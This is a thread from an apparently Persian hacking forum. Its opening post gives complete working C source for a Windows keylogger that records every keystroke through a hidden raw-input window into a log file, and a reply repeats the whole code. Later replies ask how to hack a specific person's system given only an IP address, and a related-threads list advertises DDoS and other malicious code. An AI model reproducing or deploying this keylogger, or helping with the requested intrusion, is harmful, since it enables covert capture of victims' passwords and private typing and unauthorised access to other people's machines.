• 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
سورس کد یک کیلاگر ساده ولی قوی (سی )
#1
Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level.

Code:
#define _WIN32_WINNT 0x0501
#include windows.h
// Definitions
int LogKey(HANDLE hLog, UINT vKey);
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow);
// Globals
const char g_szClassName[] = "klgClass";
// Window procedure of our message-only window
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
static HANDLE hLog;
UINT dwSize;
RAWINPUTDEVICE rid;
RAWINPUT *buffer;
switch(msg)
{
case WM_CREATE:
// Register a raw input device to capture keyboard input
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = hwnd;
if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
{
MessageBox(NULL, "Registering raw input device failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}
// open log.txt
hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hLog == INVALID_HANDLE_VALUE)
{
MessageBox(NULL, "Creating log.txt failed!", "Error",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}
// append
SetFilePointer(hLog, 0, NULL, FILE_END);
break;
case WM_INPUT:
// request size of the raw input buffer to dwSize
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize,
sizeof(RAWINPUTHEADER));
// allocate buffer for input data
buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);
if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize,
sizeof(RAWINPUTHEADER)))
{
// if this is keyboard message and WM_KEYDOWN, log the key
if(buffer->header.dwType == RIM_TYPEKEYBOARD
&& buffer->data.keyboard.Message == WM_KEYDOWN)
{
if(LogKey(hLog, buffer->data.keyboard.VKey) == -1)
DestroyWindow(hwnd);
}
}
// free the buffer
HeapFree(GetProcessHeap(), 0, buffer);
break;
case WM_DESTROY:
if(hLog != INVALID_HANDLE_VALUE)
CloseHandle(hLog);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow)
{
WNDCLASSEX wc;
HWND hwnd;
MSG msg;
// register window class
ZeroMemory(&wc, sizeof(WNDCLASSEX));
wc.cbSize = sizeof(WNDCLASSEX);
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = g_szClassName;
if(!RegisterClassEx(&wc))
{
MessageBox(NULL, "Window Registration Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}
// create message-only window
hwnd = CreateWindowEx(
0,
g_szClassName,
NULL,
0,
0, 0, 0, 0,
HWND_MESSAGE, NULL, hInstance, NULL
);
if(!hwnd)
{
MessageBox(NULL, "Window Creation Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}
// the message loop
while(GetMessage(&msg, NULL, 0, 0) > 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
int LogKey(HANDLE hLog, UINT vKey)
{
DWORD dwWritten;
BYTE lpKeyboard[256];
char szKey[32];
WORD wKey;
char buf[32];
int len;
// Convert virtual-key to ascii
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
GetKeyboardState(lpKeyboard);
len = 0;
switch(vKey)
{
case VK_BACK:
len = wsprintf(buf, "[BP]");
break;
case VK_RETURN:
len = 2;
strcpy(buf, "\r\n");
break;
case VK_SHIFT:
break;
default:
if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1)
len = wsprintf(buf, "%c", (char)wKey);
else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0)
len = wsprintf(buf, "[%s]", szKey);
break;
}
// Write buf into the log
if(len > 0)
{
if(!WriteFile(hLog, buf, len, &dwWritten, NULL))
return -1;
}
return 0;
}
  Reply
#2
(08-07-2012، 10:20 AM)'Amin_Mansouri' Wrote: Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level.


Code:
#define _WIN32_WINNT 0x0501
#include windows.h
// Definitions
int LogKey(HANDLE hLog, UINT vKey);
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow);
// Globals
const char g_szClassName = "klgClass";
// Window procedure of our message-only window
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
static HANDLE hLog;
UINT dwSize;
RAWINPUTDEVICE rid;
RAWINPUT *buffer;
switch(msg)
{
case WM_CREATE:
// Register a raw input device to capture keyboard input
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = hwnd;
if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
{
MessageBox(NULL, "Registering raw input device failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}
// open log.txt
hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hLog == INVALID_HANDLE_VALUE)
{
MessageBox(NULL, "Creating log.txt failed!", "Error",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}
// append
SetFilePointer(hLog, 0, NULL, FILE_END);
break;
case WM_INPUT:
// request size of the raw input buffer to dwSize
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize,
sizeof(RAWINPUTHEADER));
// allocate buffer for input data
buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);
if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize,
sizeof(RAWINPUTHEADER)))
{
// if this is keyboard message and WM_KEYDOWN, log the key
if(buffer->header.dwType == RIM_TYPEKEYBOARD
&& buffer->data.keyboard.Message == WM_KEYDOWN)
{
if(LogKey(hLog, buffer->data.keyboard.VKey) == -1)
DestroyWindow(hwnd);
}
}
// free the buffer
HeapFree(GetProcessHeap(), 0, buffer);
break;
case WM_DESTROY:
if(hLog != INVALID_HANDLE_VALUE)
CloseHandle(hLog);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow)
{
WNDCLASSEX wc;
HWND hwnd;
MSG msg;
// register window class
ZeroMemory(&wc, sizeof(WNDCLASSEX));
wc.cbSize = sizeof(WNDCLASSEX);
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = g_szClassName;
if(!RegisterClassEx(&wc))
{
MessageBox(NULL, "Window Registration Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}
// create message-only window
hwnd = CreateWindowEx(
0,
g_szClassName,
NULL,
0,
0, 0, 0, 0,
HWND_MESSAGE, NULL, hInstance, NULL
);
if(!hwnd)
{
MessageBox(NULL, "Window Creation Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}
// the message loop
while(GetMessage(&msg, NULL, 0, 0) > 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
int LogKey(HANDLE hLog, UINT vKey)
{
DWORD dwWritten;
BYTE lpKeyboard[256];
char szKey[32];
WORD wKey;
char buf[32];
int len;
// Convert virtual-key to ascii
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
GetKeyboardState(lpKeyboard);
len = 0;
switch(vKey)
{
case VK_BACK:
len = wsprintf(buf, "[BP]");
break;
case VK_RETURN:
len = 2;
strcpy(buf, "\r\n");
break;
case VK_SHIFT:
break;
default:
if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1)
len = wsprintf(buf, "%c", (char)wKey);
else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0)
len = wsprintf(buf, "[%s]", szKey);
break;
}
// Write buf into the log
if(len > 0)
{
if(!WriteFile(hLog, buf, len, &dwWritten, NULL))
return -1;
}
return 0;
}
محیط برنامه نویسی چی هستش؟؟؟؟؟؟
  Reply
#3
بایدبا چی بنویسیم این برنامه رو با ویووال
  Reply
#4
سی نه با وی بی نیست توضیح دادم که
  Reply
#5
جونم کاکو شیرازی

میگم کاکو شنیدم با داشتن ipیه نفر میشه به سیستمش نفوذ کرد -اگه درسته میشه برام توضیح بدی چجوری ؟؟؟؟؟
  Reply
#6
درود
در صورتی که ای پی ولید باشه راه های هست
  Reply
#7
راستش ایدی یکی از دوستام که مدیر یهچتروم-فک نکنم وایلید باش ایبیش-حال گیریم باش-ججوری باید نفوذ کرد -اگه میشه ایمیل بزنید لطفاpoyaasadi3@gmail.com -برنامه خاصی لازمهسپاسگزار
  Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  مجموعه سورس کدهای مخرب (دلفی ) Amin_Mansouri 1 6,799 11-09-2013، 09:49 PM
Last Post: dosibb
  مجموعه سورس کدهای مخرب (سی پلاس پلاس) Amin_Mansouri 0 5,878 01-29-2013، 02:49 PM
Last Post: Amin_Mansouri
  سورس کد اف تی پی کیلاگر Amin_Mansouri 0 4,064 09-17-2012، 07:12 PM
Last Post: Amin_Mansouri
  سورس کد حمله SYN Flood (دلفی) Amin_Mansouri 0 3,766 09-09-2012، 01:25 PM
Last Post: Amin_Mansouri
  سورس کد ddos به زبان دلفی Amin_Mansouri 0 4,446 09-09-2012، 01:17 PM
Last Post: Amin_Mansouri
  سورس کد کیلاگر (سی شارپ) Amin_Mansouri 3 12,318 05-27-2012، 10:44 PM
Last Post: Ghoghnus
  سورس غیر فعال کردن تسک منیجر (سی پلاس پلاس) Amin_Mansouri 0 4,169 01-10-2012، 11:45 PM
Last Post: Amin_Mansouri
  درخواست سورس کد کی‌ لاگر newcoder 4 11,718 12-30-2011، 09:19 PM
Last Post: Ghoghnus
  سورس غیر فعال کردن uac با سی شارپ Amin_Mansouri 0 4,334 10-18-2011، 08:52 PM
Last Post: Amin_Mansouri

Forum Jump:


Users browsing this thread: 1 Guest(s)